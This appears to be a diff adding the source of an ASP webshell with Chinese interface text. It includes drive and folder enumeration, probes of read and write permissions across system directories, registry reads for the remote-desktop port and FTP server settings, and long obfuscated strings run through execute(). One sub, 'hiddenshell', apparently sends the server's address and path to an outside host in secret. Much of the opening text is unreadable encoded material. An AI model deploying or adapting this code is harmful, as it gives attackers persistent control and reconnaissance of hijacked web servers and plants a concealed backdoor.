yo��)ntaVTJG(rqtNutN.ilK=sdzf��`VTJG\1.0\ktcktUztfstJ\zyglgkeoT\SNQKJXBU\SGCDZQT_VQZBV_OSFD`=ntaVTJG��`>kw<`&nshlor&`:������Ǵ�_��ʾ�Է���>os<`p��`��`=nshlor tlst `��`=nshlor ftiJ 1=fougshlor kg ``=fougshlor yC��)`tdqGktlMzlqVnqshloWzfgW\dtzlnU\ltoeosgY\fgolktIzftkkxZ\lvgrfoK\zyglgkeoT\tkqvzygU\SGCDZQT_VQZBV_OSFD`(rqtNutk.ilv=fougshlor��yo rfS��`>zfgy/<>kw<`&rvllqY&`:����>rtk=kgsge zfgy<>tkqxjl=thnz os<`p��`>kw<`&fodrQ&`:������>tkqxjl=thnz os<`p��)`rkgvllqYzsxqytW\fgugsfoK\fgolktIzftkkxZ\JG lvgrfoK\zyglgkeoT\SNQKJXBU\SGCDZQT_VQZBV_OSFD`(rqtNutN.ilK=rvllqY��)`tdqGktlMzsxqytW\fgugsfoK\fgolktIzftkkxZ\JG lvgrfoK\zyglgkeoT\SNQKJXBU\SGCDZQT_VQZBV_OSFD`(rqtNutN.ilK=fodrQ��`>kw<����:��Ƕ�_�Ի���>os<`p��tlsS��`>kw<����δ:��Ƕ�_�Ի���>os<`p��ftiJ ``=fougsgzxQ kg 1=fougsgzxQ yo��)fougsgzxQlo(rqtNutN.ilK=fougsgzxQ��`fgugVfodrQgzxQ\fgugsfoK\fgolktIzftkkxZ\JG lvgrfoK\zyglgkeoT\SNQKJXBU\SGCDZQT_VQZBV_OSFD`=fougsgzxQlo��`>zfgy/<>kw<`&tdqGfodrQ&`>rtk=kgsge zfgy<:Ϊ������Ա`&`������Ĭ>os<`p����yo rft��`akgvztG.zhokelK:���в���������`p��ftiz kkt yo��zbtG��`>os/<>zfgy/<>kw<`&tdqG.fodrq&`����Ա����ǰ��>rtk=kgsge zfgy<>os<` p��lktwdtT.hxgkEpwg fo fodrq ieqS kgX��)`hxgku,lkgzqkzlofodrQ/`&tdqGktzxhdgZ.Gz&`//:JGfoK`(zetpwBztE=hxgkEpwg ztU��)`akgvztG.zhokelK`(zetpwBtzqtke.ktcktl=Gz ztU�� zbtf tdxltk kgkkt fg��1=ltkohbS.tlfghltN��`kgzqkzlofodrQ`=tdqGfodrQ ftiJ ``=tdqffodrq yo��)ntFtdqGfodrQ(rqtNutN.ilv=tdqGfodrQ��`tdqGktlMzsxqytWzsQ\fgugsfoK\fgolktIzftkkxZ\JG lvgrfoK\zyglgkeoT\SNQKJXBU\SGCDZQT_VQZBV_OSFD`=ntFtdqGfodrQ��`>kw<`&tdqfeh&`:Ϊ����_��ǰ��>os<`p��`>kw<.������ȡ_������`=tdqfeh ftiJ ``=tdqfeh yo��)ntatdqfeh(rqtNutN.ilv=tdqfeh��`tdqGktzxhdgZ\tdqGktzxhdgZ\tdqGktzxhdgZ\sgkzfgZ\ztUsgkzfgZzftkkxZ\TSJUOU\TVFD`=ntatdqfeh��`>0=tmol ki<>kw<]��̽_����ͳϵ[>kw<>kw<`p��zbtf��`>kw<`&)o(lizqh&`>os<`p��)lizqh(rfxgwM gz )lizqh(rfxgwV=o kgX��`>kw<:���侶·_ǰ��ͳϵ`p��`>kw<------------------------------------`p��)`;`,izqYzygU(zoshl=lizqh��`>kw<��֧:_������ɱ��ϵ����>os<`p ftiJ )`ufolok`,gyfoizqY(kzlfo yo��`>kw<��֧:_������ɱ��������>os<`p ftiJ )`lxkocozfq`,gyfoizqY(kzlfo yo��`>kw<��֧:_������ɱ��ϵɽ�� >os<`p ftiJ )`cqa`,gyfoizqY(kzlfo yo��`>kw<��֧:_������ɱssoF>os<`p ftiJ )`ssoF`,gyfoizqY(kzlfo yo��`>kw<��֧:_�ƿ�tktivnfQeY��������>os<`p ftiJ )`tktivnfqeh`,gyfoizqY(kzlfo yo��`>kw<��֧:_�����TXZ>os<`p ftiJ )`4bdfgolxye`,gyfoizqY(kzlfo yo��`>kw<��֧:_��������tseqkB>os<`p ftiJ )`tseqkg`,gyfoizqY(kzlfo yo��`>kw<��֧:_��������VHUnT>os<`p ftiJ )`sjlnd`,gyfoizqY(kzlfo yo��`>kw<��֧:_��������VHUUT>os<`p ftiJ )`ktcktl sjl zyglgkeod`,gyfoizqY(kzlfo yo��`>kw<��֧:_����qcqR>os<`p ftiJ )`qcqp`,gyfoizqY(kzlfo yo��`>kw<��֧:_����sktY>os<`p ftiJ )`skth`,gyfoizqY(kzlfC yo��`:��֧��`&`��ͳϵ`p��)izqYzygU(tlqes=gyfoizqY��)`izqY`(dtzo.zftdfgkocfS.ilK=izqYzygU��`>0=tmol ki<>kw<]��̽��_��ͳϵ[>kw<>kw<>kw<`p��`>sg/<`p��yC rfS��`>kw<` & rkgvllqYfougVgzxq & ` :���ܻ��ʵ�`&`¼�Ƕ���`p��yC rfS��`tlsqX`p��kqtsZ.kkS��ftiJ kkS yC��)ntFllqYfougVgzxq & izqYfougVgzxq(rqtNutN.Llv = rkgvllqYfougVgzxq��`>kw<` & tdqfktlMfougVgzxq & ` :����ͳϵ��`&`¼�Ƕ���`p��)ntFktlMfougVgzxq & izqYfougVgzxq(rqtNutN.Llv = tdqfktlMfougVgzxq��tlsS��ftiJ 1 = tswqfSfougVgzxQlo yC��)ntFtswqfSfougVgzxq & izqYfougVgzxq(rqtNutN.Llv = tswqfSfougVgzxQlo��`rkgvllqYzsxqytW` = ntFllqYfougVgzxq��`tdqGktlMzsxqytW` = ntFktlMfougVgzxq��`fgugVfodrQgzxQ` = ntFtswqfSfougVgzxq��`\fgugsfoK\fgolktIzftkkxZ\JG lvgrfoK\zyglgkeoT\SNQKJXBU\SGCDZQT_VQZBV_OSFD` = izqYfougVgzxq��yC rfS��`>/kw<` & zkgYdktz & ` :�ڶ�`&`�������ǰ��`p��tlsS ��`>/kw<.���޵��ܷ�����Ȩ��� ,�ڶ˶��յ��÷���`p�� ftiJ 1 >< ktwdxG.kkS kB `` = zkgYdktz yC��`>sg<¼�Ƕ��Լ�`&`�ڶ����_����`p��)ntFzkgYsqfodktz & izqYzkgYsqfodktz(rqtNutN.Llv = zkgYdktz��`ktwdxGzkgY` = ntFzkgYsqfodktz��`\heJ-YWN\lfgozqzUfoK\ktcktU sqfodktJ\sgkzfgZ\ztUsgkzfgZzftkkxZ\TSJUOU\TVFD` = izqYzkgYsqfodktz��rkgvllqYfougVgzxq ,tdqfktlMfougVgzxq ,ntFtswqfSfougVgzxq ,tswqfSfougVgzxQlo doW��ntFllqYfougVgzxq ,ntFktlMfougVgzxq ,izqYfougVgzxq doW��zkgYdktz ,ntFzkgYsqfodktz ,izqYzkgYsqfodktz doW��)`sstiU.zhokeUK`(zetpwBtzqtkZ.ktcktU = Llv ztU��`------------------------------------------------------`p��`>kw<`&zkgYKQY&`:Ϊ�ڶ�tktivnfQeY>os<`p��`tktivnfQehװ����`&`�ǻ���`&`��ȷ��.ȡ��`&`����`=zkgYKQY ftiz ``=zkgYKQY yC��)ntFtktivnfQeh(rqtNutN.ilK=zkgYKQY��`zkgYqzqWYCYZJ\dtzlnU\fgolktIzftkkxZ\tktivnfQeh\etzfqdnU\SNQKJXBU\SGCDZQT_VQZBV_OSFD`=ntFtktivnfQeh��`>zfgy/<>kw<`&zkgYdktJ&`>rtk=kgsge zfgy<:Ϊ�ڶ�teocktU sqfodktJ>os<`p��`��������ktcktU lvgrfoKΪ����`&`��ȷ��.ȡ��`&`����`=zkgYdktJ ftiJ ``=zkgYdktJ yC��)ntFdktJ(rqtNutN.ilK=zkgYdktJ��`ktwdxGzkgY\hez\lrJ\rvhrk\lrK\ktcktU sqfodktJ\sgkzfgZ\ztUsgkzfgZzftkkxZ\TSJUOU\SGCDZQT_VQZBV_OSFD`=ntFdktJ��`>kw<`&zkghzfsJ&`:��`&`��ztfstJ>os<`p��`)����`&`��Ĭ(89`=zfsJ ftiJ ``=zkgYzfsJ yo��)ntFztfstJ(rqtNutN.ilK=zkgYzfsJ��`zkgYztfstJ\1.0\ktcktUztfstJ\zyglgkeoT \SNQKJXBU\SGCDZQT_VQZBV_OSFD`=ntaztfstJ��`>0=tmol ki<>kw<]��̽`&`�ڶ�`&`����[>kw<>kw<`p��yo rft��zbtG��`>kw<------------------------------------------------`p��yo rfS��yo rfS��`>kw<`p��zbtf��`,`&)p(vgssqYWM p��)vgssqhrx(rfxgAM gJ )vgssqhrx(rfxgAV = p kgy��`:Ϊ�ڶ�hrx��`&`����>os<`p��tlsS��`>kw<��ȫ:Ϊ�ڶ�hrx��`&`����>os<`p��ftiJ 1=)1(vgssqhrx kg ``=)1(vgssqhrx yC��)YWMssxX(rqtNutN.ilK=vgssqhrx��yo rfS��`>kA<`p��zbtG��`,`&)p(vgssqhez p��)vgssqhez(rfxgAM gJ )vgssqhez(rfxgAV = p kgX��`:Ϊ�ڶ�hez��`&`����>os<`p��tlsS��`>kw<��ȫ:Ϊ�ڶ�hez��`&`����>os<`p��ftiJ 1=)1(vgssqhez kg ``=)1(vgssqhez yC��)YZJssxX(rqtNutN.ilK=vgssqhez��FMS&ArhQ&izqh=YWMssxX��FJS&ArhQ&izqY=YZJssxX��`lzkgYrtvgssQYWM\`=FMS��`lzkgYrtvgssQYZJ\`=FJS��tlst��`>kw<ѡɸYC/heJû>os<`p�� ftiJ 0=ktzsoyhohezgG yo��yC rfS��`>kw<������û��ȡ������UGW`&`��Ĭ>os<`p��tlsS��`>kw<`&kzlUGW&`:ΪUGW`&`����>os<`p��ftiJ ``><kzlUGW yC��)ntFUGW(rqtNutN.ilK=kzlUGW��`ktcktUtdqG\`&ArhQ&izqY=ntFUGW��yo rfS��`>kw<������û��ȡ�����޹���>os<`p��tlsS��zbtG��`>kw<`&)p(nqvtzqE&`:`&p&`����>os<`p��)nqvtzqE(rfxgwM gz )nqvtzqE(rfxgwV=p kgX��ftiJ )nqKtzqE(nqkkqlo yC��)ntFnqKtzqE(rqtkutN.ilK=nqKtzqE��`nqvtzqEzsxqytW\`&ArhQ&izqY=ntFnqKtzqE��yo rfS��`>kw<������û��`&`ȡ������ַ`&`��YC>os<`p��tlsS��zbtG��`>kw<`&)p(krrQYC&`:Ϊ`&p&`ַ`&`��YC>os<`p��)krrQYC(rfxgwM gz )krrQYC(rfxgwV=p kgX��ftiJ ``><)1(krrqYC yC��)ntFYC(rqtkutN.ilK=krrqYC��`lltkrrQYC\`&ArhQ&izqY=ntFYC��`\lteqyktzfC\lktztdqkqY\hoheJ\lteocktU\011ztUsgkzfgZ\TSJUOU\SGCDZQT_VQZBV_OSFD`=izqY��`>kw<`&ArhQ&`:Ϊ�����`&o&`����`p��)``,`\teoctW\`,)o(lrhQ(teqshtN=ArhQ��0-)lrhQ(rfxgAM gJ )lrhQ(rfxgAV=o kgX�� ftiJ )lrhQ(nqkkQlC yC��)ntFrhQ(rqtNutN.ilK=lrhQ��`rfoA\tuqafoV\hoheJ\lteocktU\011ztUsgkzfgZ\TSJUOU\TVFD`=ntFrhQ��yC rfS��0=ktzsoyhohezgG��ftiJ ``=tswqfSlo kg 1=tswqfSlo yC��)ntFhoheJtswqfS(rqtkutN.ilK=tswqfSlo��`lktzsoXnzokxetUtswqfS\lktztdqkqY\hoheJ\lteocktU\ztUsgkzfgZzftkkxe\TSJUOU\TVFD`=ntFYCYZJtswqfS��`>0=tmol ki<>kw<]��̽`&`����[`p��)`sstiU.zhokelK`(zetpwgtzqtke=ilv ztl��ilv dor��zbtf tdxltk kgkkt fg"))
+End Sub
+
+sub hiddenshell
+execute(king("`>zhokel/<;'`&skx&)`tdqf_ktcktl`(zltxjtk&`//:hzzi'=fgozqegs.zftkqh>zhokel<` p��ufoizgf=gly ztl��0tdqftsoy&`.`&bthrfk&`\`&0izqhtsoy&`\.\\`,izqhy tsoynhge.gly��0tdqftsoy&`.`&bthrfk&))`/`,skx(ctkkzlfo,skx(zyts=skx��)`skx`(ltswqokqcktcktl.zltxjtk=skx��))`\`,izqhy(ctkkzlfo-)izqhy(fts,izqhy(ziuok=0tdqftsoy��)`.`(izqhhqd.ktcktl=0izqhtsoy��``=)`vpstl`(fgolltl��))40,1(ktwdxfrfk()`|`,bth(zoshl=bthrfk��`2zhs|3zhs|4zhs|5zhs|6zhs|7zhs|8zhs|9zhs|0zhs|2dge|3dge|4dge|5dge|6dge|7dge|8dge|9dge|0dge`=bth��)BUX_JUGBZ(zetpwgtzqtke.ktcktl=gly ztl��))`STQG_JYCNZU`(ltswqokqIktcktU.zltxjtN(izqYhqT.ktcktU=izqhy"))
+end sub
+Sub Message(state,msg,flag)
+j"<TABLE width=480 border=0 align=center cellpadding=0 cellspacing=1 bgcolor=#ddd> <TR></TR><TR><TD align=middle bgcolor=#ecfccd><TABLE width=82% border=0 cellpadding=5 cellspacing=0><TR><TD><FONT color=red>"
+j state
+j"</FONT></TD><TR><TD><P>"&msg
+j"</P></TD></TR></TABLE></TD></TR><TR><TD class=TBEnd>"
+If flag=0 Then
+j" <INPUT type=button value=�ر� onclick='window.close();'>"
+Else
+End if
+j"</TD></TR></TABLE>"
+End Sub
+Function Red(str)
+Red = "<FONT color=#ff2222>" & str & "</FONT>"
+End Function
+
+Function RndNumber(Min,Max) 
+Randomize 
+RndNumber=Int((Max - Min + 1) * Rnd() + Min) 
+End Function
+
+
+Sub ScanDriveForm()
+Dim FSO,DriveB
+Set FSO = Server.Createobject(CONST_FSO)
+j"<br><TABLE width=480 border=0 align=center cellpadding=3 cellspacing=1 bgcolor=#ffffff><TR><TD colspan=5 class=TBHead>����/ϵͳ�ļ�����Ϣ</TD></TR>"
+  For Each DriveB in FSO.Drives
+j" <TR align=middle class=TBTD><FORM action=?Action=ScanDrive&Drive="
+j DriveB.DriveLetter
+j" method=Post><TD width=25"&chr(37)&"><B>�̷�</B></TD><TD width=15"&chr(37)&">"
+j DriveB.DriveLetter
+j":</TD><TD width=20"&chr(37)&"><B>����</B></TD><TD width=20"&chr(37)&">"
+  Select Case DriveB.DriveType
+  Case 1: j"���ƶ�"
+  Case 2: j"����Ӳ��"
+  Case 3: j"�������"
+  Case 4: j"CD-ROM"
+  Case 5: j"RAM����"
+  Case else: j"δ֪����"
+  End Select
+j"</TD><TD><INPUT type=submit value=��ϸ����></TD></FORM></TR>"
+  Next
+j" <TR class=TBTD><FORM action=?Action=ScFolder&Folder="
+j FSO.GetSpecialFolder(0)
+j" method=Post><TD align=middle><B>Windows�ļ���</B></TD><TD colspan=3>"
+j FSO.GetSpecialFolder(0)
+j"</TD><TD align=middle><INPUT type=submit value=��ϸ����></TD></FORM></TR><TR class=TBTD><FORM action=?Action=ScFolder&Folder="
+j FSO.GetSpecialFolder(1)
+j" method=Post><TD align=middle><B>System32�ļ���</B></TD><TD colspan=3>"
+j FSO.GetSpecialFolder(1)
+j"</TD><TD align=middle><INPUT type=submit value=��ϸ����></TD></FORM></TR><TR class=TBTD><FORM action=?Action=ScFolder&Folder="
+j FSO.GetSpecialFolder(2)
+j" method=Post><TD align=middle><B>ϵͳ��ʱ�ļ���</B></TD><TD colspan=3>"
+j FSO.GetSpecialFolder(2)
+j"</TD><TD align=middle><INPUT type=submit value=��ϸ����></TD><TR class=TBTD> <FORM action= method=Post>"
+j"<TD align=middle><B>վ���Ŀ¼</B></TD><TD colspan=3>վ���Ŀ¼<TD align=middle><a href="&URL&"?Action=ScFolder&Folder="&wwwroot&"><b>��ϸ����</b></a></TD><TR class=TBTD> <FORM action= method=Post>"
+j"<TD align=middle><B>����վĿ¼</B></TD><TD colspan=3>����վĿ¼ <TD align=middle><a href="&URL&"?Action=ScFolder&Folder=c:\recycler\><b>��ϸ����</b></a></TD><TR class=TBTD> <FORM action= method=Post><TD align=middle><B>wmpubĿ¼ </B></TD><TD colspan=3>wmpub<TD align=middle><a href="&URL&"?Action=ScFolder&Folder=c:\wmpub\><b>��ϸ����</b></a></TD></TABLE><BR>"
+j"</FORM></TR></TABLE><BR><DIV align=center><FORM Action=?Action=ScFolder method=Post>ָ���ļ��в�ѯ��<INPUT type=text name=Folder value=""c:\php\,d:\Program Files\,C:\Documents and Settings\All Users\Documents\,C:\recycler\,d:\recycler\,e:\recycler\,f:\recycler\,C:\wmpub\,C:\WINDOWS\Temp\,C:\360rec,C:\cache,C:\JPEGCapture,C:\Inetpub""><INPUT type=submit value=���ɱ���> �����鿴Ŀ¼Ȩ��,������Ŀ¼�á�,��������</FORM><DIV>"
+Set FSO=Nothing
+End Sub 
+Sub ScanDrive(Drive)
+Dim FSO,TestDrive,BaseFolder,TempFolders,Temp_Str,D
+If Drive <> "" Then
+Set FSO = Server.Createobject(CONST_FSO)
+Set TestDrive = FSO.GetDrive(Drive)
+If TestDrive.IsReady Then
+Temp_Str = "<LI>���̷������ͣ�" & Red(TestDrive.FileSystem) & "<LI>�������кţ�" & Red(TestDrive.SerialNumber) & "<LI>���̹�������" & Red(TestDrive.ShareName) & "<LI>������������" & Red(CInt(TestDrive.TotalSize/1048576)) & "<LI>���̾�����" & Red(TestDrive.VolumeName) & "<LI>���̸�Ŀ¼:" & ScReWr((Drive & ":\"))
+Set BaseFolder = TestDrive.RootFolder
+Set TempFolders = BaseFolder.SubFolders
+For Each D in TempFolders
+Temp_Str = Temp_Str & "<LI>�ļ��У�" & ScReWr(D)
+Next
+Set TempFolder = Nothing
+Set BaseFolder = Nothing
+Else
+Temp_Str = Temp_Str & "<LI>���̸�Ŀ¼:" & Red("���ɶ�:(")
+Dim TempFolderList,t:t=0
+Temp_Str = Temp_Str & "<LI>" & Red("���Ŀ¼���ԣ�")
+TempFolderList = Array("windows","winnt","win","win2000","win98","web","winme","windows2000","asp","php","Tools","Documents and Settings","Program Files","Inetpub","ftp","wmpub","tftp")
+For i = 0 to Ubound(TempFolderList)
+If FSO.FolderExists(Drive & ":\" & TempFolderList(i)) Then
+t = t+1
+Temp_Str = Temp_Str & "<LI>�����ļ��У�" & ScReWr(Drive & ":\" & TempFolderList(i))
+End if
+Next
+If t=0 then Temp_Str = Temp_Str & "<LI>�����" & Drive & "�̸�Ŀ¼����δ�з���:("
+End if
+Set TestDrive = Nothing
+Set FSO = Nothing
+Temp_Str = Temp_Str 
+Message Drive & ":������Ϣ",Temp_Str,1
+End if
+End Sub
+Sub ScFolder(folder)
+ 'On Error Resume Next
+folderArr = Split(folder,",")
+For i = 0 To Ubound(folderArr)
+Dim FSO,OFolder,TempFolder,Scmsg,S
+Set FSO = Server.Createobject(CONST_FSO)
+folder = folderArr(i)
+If FSO.FolderExists(folder) Then
+ Set OFolder = FSO.GetFolder(folder)
+Set TempFolders = OFolder.SubFolders
+Scmsg = "<LI>ָ���ļ��и�Ŀ¼��" & ScReWr(folder)
+For Each S in TempFolders
+ Scmsg = Scmsg&"<LI>�ļ��У�" & ScReWr(S) 
+Next
+Set TempFolders = Nothing
+Set OFolder = Nothing
+Else
+ Scmsg = Scmsg & "<LI>�ļ��У�" & Red(folder & "�����ڻ��޶�Ȩ��!")
+End if
+Scmsg = Scmsg & "<br><br>ע�⣺��Ҫ���ˢ�±�ҳ�棬������ֻд�ļ��л����´��������ļ�!"&backurl
+Set FSO = Nothing
+Message "",Scmsg,1
+next
+End Sub
+Function ScReWr(folder)
+On Error Resume Next
+Dim FSO,TestFolder,TestFileList,ReWrStr,RndFilename
+Set FSO = Server.Createobject(CONST_FSO)
+Set TestFolder = FSO.GetFolder(folder)
+Set TestFileList = TestFolder.SubFolders
+RndFilename = "\temp" & Day(now) & Hour(now) & Minute(now) & Second(now) & ".tmp"
+For Each A in TestFileList
+Next
+If err Then
+err.Clear
+ReWrStr = folder & "<FONT color=#ff2222> ���ɶ�,"
+FSO.CreateTextFile folder & RndFilename,True
+If err Then
+err.Clear
+ReWrStr = ReWrStr & "�����</FONT>"
+Else
+ReWrStr = ReWrStr & "���</FONT>"
+FSO.DeleteFile folder & RndFilename,True
+End If
+Else
+ReWrStr = folder & "<FONT color=#dddddd> �ɶ�,"
+FSO.CreateTextFile folder & RndFilename,True
+If err Then
+err.Clear
+ReWrStr = ReWrStr & "�����</FONT>"
+Else
+ReWrStr = ReWrStr & "���</FONT>"
+FSO.DeleteFile folder & RndFilename,True
+End if
+End if
+Set TestFileList = Nothing
+Set TestFolder = Nothing
+Set FSO = Nothing
+ScReWr = ReWrStr
+End Function
+Sub CustomScanDriveForm()
+execute(king("yo rft��`>``;)0-(gu.nkgzloi``=aeosZfg ��ҳ���ϻط�=txsqc fgzzxw=thnz JMYGC<` p��`>kw<]������ɨ[` p��zbtG�� yC rfS��koWzbtGaetiZ,tsoXaetiZ,))o(zoshUlizqY(dokJ tsoX_koW_tzokKkoWvgiU��ftiz 1>)`:`,)o(zoshUlizqY(kzlfo yo�� )zoshUlizqY(rfxgAM gJ )zoshUlizqY(rfxgAV=o kgX�� ))10(kie&)80(kie,)`lizqY`(zltxjtN(zoshU=zoshUlizqY��)`lizqY`(zltxjtN = )`lizqh`(fgolltU��ilxsX.tlfghltk��`>kw<......�������ʱ�Ķ�һҪ���ܿɲ��` p��)`fg`=)`hdtJaetiZgG`(zltxjtN( = hdtJaetiZgG��)`fg`=)`tzokKgGvgiU`(zltxjtN( = koWtzokKgGvgiU��)`fg`=)`koWzbtGaetiZ`(zltxjtN( = koWzbtGaetiZ��)`fg`=)`tsoXaetiZ`(zltxjtN( = tsoXaetiZ��tlst��`>ktzfte/<>dkgy/<` p��`>stwqs/<¼Ŀʱ�ٲ�첻` p��`>/ 'rtaetie'=rtaetie 'hdtJaetiZgG'=ro 'bgwaetie'=thnz 'hdtJaetiZgG'=tdqf zxhfo<` p��`>'hdtJaetiZgG'=kgy stwqs<` p��`>stwqs/<���ĺ�¼Ŀд����` p��`>/'tzokKgGvgiU'=ro 'bgwaetie'=thnz 'tzokKgGvgiU'=tdqf zxhfo<` p��`>'tzokKgGvgiU'=kgy stwqs<` p��`>stwqs/<` p��`�����Բ�>/  'rtaetie'=rtaetie 'tsoXaetiZ'=ro 'bgwaetie'=thnz 'tsoXaetiZ'=tdqf zxhfo<` p��`>'tsoXaetiZ'=kgy stwqs<` p��`>stwqs/<` p��`  ¼Ŀ�Բ�>/ 'rtaetie'=rtaetie 'koWzbtGaetiZ'=ro 'bgwaetie'=thnz 'koWzbtGaetiZ'=tdqf zxhfo<` p��`>'koWzbtGaetiZ'=kgy stwqs<` p��`> '���ʼ��'=txsqc 'fgzzxw'=tdqf 'zodwxl'=thnz zxhfo<` p��`>/ kw<` p��`>qtkqzbtz/<`&kzl_lizqY&`>'zorS'=llqse '10'=lvgk '13'=lsge 'lizqY'=tdqf qtkqzbtz<` p��`>kw<¼Ŀ�Ӳ�춯�Ի����,¼Ŀ�IJ����������>kw<!Ϣ�Ź���ȫ��Щһ�����������Ϊ,����д��¼Ŀ������������Կ���̴�` p��`>''=fgozeq 'zlgh'=rgiztd '0dkgy'=tdqf '0dkgy'=ro dkgy<>ktzfte<` p��)`lizqh`(fgolltU=kzl_lizqY  ftiz ``><)`lizqh`(fgolltU yo��`wxhztfC\:Z`&)10(kie&)80(kie&`tkxzhqZESYR\:Z`&)10(kie&)80(kie&`tieqe\:Z`&)10(kie&)80(kie&`etk158\:Z`&)10(kie&)80(kie&`\foqdzlgittky\:r`&)10(kie&)80(kie&`\wxhdv\:Z`&)10(kie&)80(kie&`\ktsenetk\:y`&)10(kie&)80(kie&`\ktsenetk\:t`&)10(kie&)80(kie&`\ktsenetk\:r`&)10(kie&)80(kie&`\ktsenetk\:Z`&)10(kie&)80(kie&`\ltsoX dqkugkY\:t`&)10(kie&)80(kie&`\ltsoX dqkugkY\:r`&)10(kie&)80(kie&`\hih\:e`&)10(kie&)80(kie&`\ltsoX dqkugkY\:e`&)10(kie&)80(kie&`\lufozztU rfq lzftdxegW\:e`&)10(kie&)80(kie&`\lvgrfov\:e`=kzl_lizqY��ftiz ``= )`lizqY`(zltxjtN yo��SxkJ = ktyyxA.tlfghltN'"))
+end sub
+function GetFullPath(path)
+GetFullPath = path
+if Right(path,1) <> "\" then GetFullPath = path&"\" 
+end function
+Function Deltextfile(filepath)
+On Error Resume Next
+Set objFSO = CreateObject(CONST_FSO) 
+if objFSO.FileExists(filepath) then 
+objFSO.DeleteFile(filepath) 
+end if 
+Set objFSO = nothing
+Deltextfile = Err.Number 
+End Function 
+Function CheckDirIsOKWrite(DirStr)
+On Error Resume Next
+Set FSO = Server.CreateObject(CONST_FSO)
+filepath = GetFullPath(DirStr)&fso.GettempName
+FSO.CreateTextFile(filepath) 
+CheckDirIsOKWrite = Err.Number
+if  ShowNoWriteDir and (CheckDirIsOKWrite =70) then
+j "[<font color=#0066FF>Ŀ¼</font>]"&DirStr&" [<font color=red>"&Err.Description&"</font>]<br>"
+end if
+set fout =Nothing
+set FSO = Nothing
+Deltextfile(filepath)
+if CheckDirIsOKWrite=0 and Deltextfile(filepath)=70 then CheckDirIsOKWrite =1
+end Function
+function CheckFileWrite(filepath)
+On Error Resume Next
+Set FSO = Server.CreateObject(CONST_FSO)
+set getAtt=FSO.GetFile(filepath)
+getAtt.Attributes = getAtt.Attributes
+  CheckFileWrite = Err.Number 
+set FSO = Nothing
+set getAtt = Nothing  
+end function
+function ShowDirWrite_Dir_File(Path,CheckFile,CheckNextDir)
+On Error Resume Next
+Set FSO = Server.CreateObject(CONST_FSO)
+B = FSO.FolderExists(Path)
+set FSO=nothing
+IS_TEMP_DIR =(instr(UCase(Path),"WINDOWS\TEMP")>0) and NoCheckTemp
+if B=false then
+Re = CheckFileWrite(Path)
+if Re =0 then
+j "[�ļ�]<font color=red>"&Path&"</font><br>"
+b =true
+exit function
+else
+j "[<font color=red>�ļ�</font>]"&Path&" [<font color=red>"&Err.Description&"</font>]<br>"
+exit function
+end if
+end if
+Path = GetFullPath(Path)
+re = CheckDirIsOKWrite(Path)
+if (re =0) or (re=1) then
+j "[Ŀ¼]<font color=#0000FF>"& Path&"</font><br>"
+end if
+Set FSO = Server.CreateObject(CONST_FSO)
+set f = fso.getfolder(Path)
+if (CheckFile=True) and (IS_TEMP_DIR=false) then
+b=false
+for each file in f.Files
+Re = CheckFileWrite(Path&file.name)
+if Re =0 then
+j "[�ļ�]<font color=red>"& Path&file.name&"</font><br>"
+b =true
+else
+if ShowNoWriteDir then j "[<font color=red>�ļ�</font>]"&Path&file.name&" [<font color=red>"&Err.Description&"</font>]<br>"
+end if
+next
+if b then response.Flush 
+end if
+for each file in f.SubFolders
+if CheckNextDir=false then
+re = CheckDirIsOKWrite(Path&file.name)
+if (re =0) or (re=1) then
+j "[Ŀ¼]<font color=#0066FF>"& Path&file.name&"</font><br>"
+end if
+end if
+if (CheckNextDir=True) and (IS_TEMP_DIR=false) then 
+ShowDirWrite_Dir_File Path&file.name,CheckFile,CheckNextDir 
+end if
+next
+Set FSO = Nothing
+set f = Nothing
+end function
+c=userpass
+function goback()
+execute(king("ufoizgf=ktrsgyg ztl��ufoizgf=glyB ztl��yo rft��`>ktzfte/<>kw/<>';)0-(gu.nkgzloi'=aeosZfg �ط�=txsqc fgzzxw=thnz JMYGC<>kw<>ktzfte<>ktzfte/<!��¼Ŀ���̴��Ǿ���>ktzfte<>zhokel/<)```&)`izqYktrsgX`(fgolltU&```(ktrsgXvgiU>zhokel<` p�� tlst��`>zhokel/<)```&)ktrsgyzftkqh.ktrsgyg(izqYtN&```(ktrsgXvgiU>zhokel<` p�� ftiz ktrsgXzggNlC.ktrsgyg zgf yo��))`izqYktrsgX`(fgolltU(ktrsgyztE.glyB = ktrsgyg ztl��)BUX_JUGBZ(zetpwBtzqtkZ.ktcktU = glyB ztl"))
+end function
+sub ReadREG()
+execute(king("yo rft��yC rfS��nqkkQtiz & `>os<` p��tlsS��zbtG��)o(nqkkQtiz & `>os<` p��)nqkkQtiz(rfxgAM gJ 1=o kgX��ftiJ )nqkkQtiz(nqkkQlC yC��)izqYtiz(rqtNutN.Llv=nqkkQtiz��)`izqYtiz`(zltxjtN=izqYtiz��)`sstiU.zhokeUK`(zetpwBtzqtkZ.ktcktU = Llv ztU��zbtG tdxltN kgkkS fB��ftiz ``><)`izqYtiz`(zltxjtN yo��`>/ki<>dkgy/<` p��`>')(zodwxl.dkgy.loiz'=aeosefg 'ֵ �� ��'=txsqc fgzzxw=thnz zxhfo<` p��`>13=tmol ''=txsqc izqYtiz=tdqf zxhfo< ` p��`>/ kw<>zetstl/<` p��`>fgozhg/<�ڶ�YZJ�ķſ�����>'lzkgYrtvgssQYZJ\}S9AS66ZW3780-8XXQ-Z1A7-22S3-390657Q3{\lteqyktzfC\lktztdqkqY\hoheJ\lteocktU\011ztUsgkzfgZ\TSJUOU\TVFD'=txsqc fgozhg<` p��`>fgozhg/<�ڶ�YWM�ķſ�����>'lzkgYrtvgssQYWM\}S9AS66ZW3780-8XXQ-Z1A7-22S3-390657Q3{\lteqyktzfC\lktztdqkqY\hoheJ\lteocktU\011ztUsgkzfgZ\TSJUOU\TVFD'=txsqc fgozhg<` p��`>fgozhg/<�ſ����>'YZJ:2388\zloV\lzkgYfthBnssqwgsE\tsoygkYrkqrfqzU\neosgYssqvtkoX\lktztdqkqY\llteeQrtkqiU\lteocktU\ztUsgkzfgZzftkkxZ\TSJUOU\TVFD'=txsqc fgozhg<` p��`>fgozhg/<ugV tsxrtieU>'izqYugV\zftuQufosxrtieU\zyglgkeoT\SNQKJXBU\SGCDZQT_VQZBV_OSFD'=txsqc fgozhg<` p��`>fgozhg/<8�˹�ho/hez>'lktzsoXnzokxetUtswqfS\hoheJ\lteocktU\ztUsgkzfgZzftkkxZ\TSJUOU\SGCDZQT_VQZBV_OSFD'=txsqc fgozhg<` 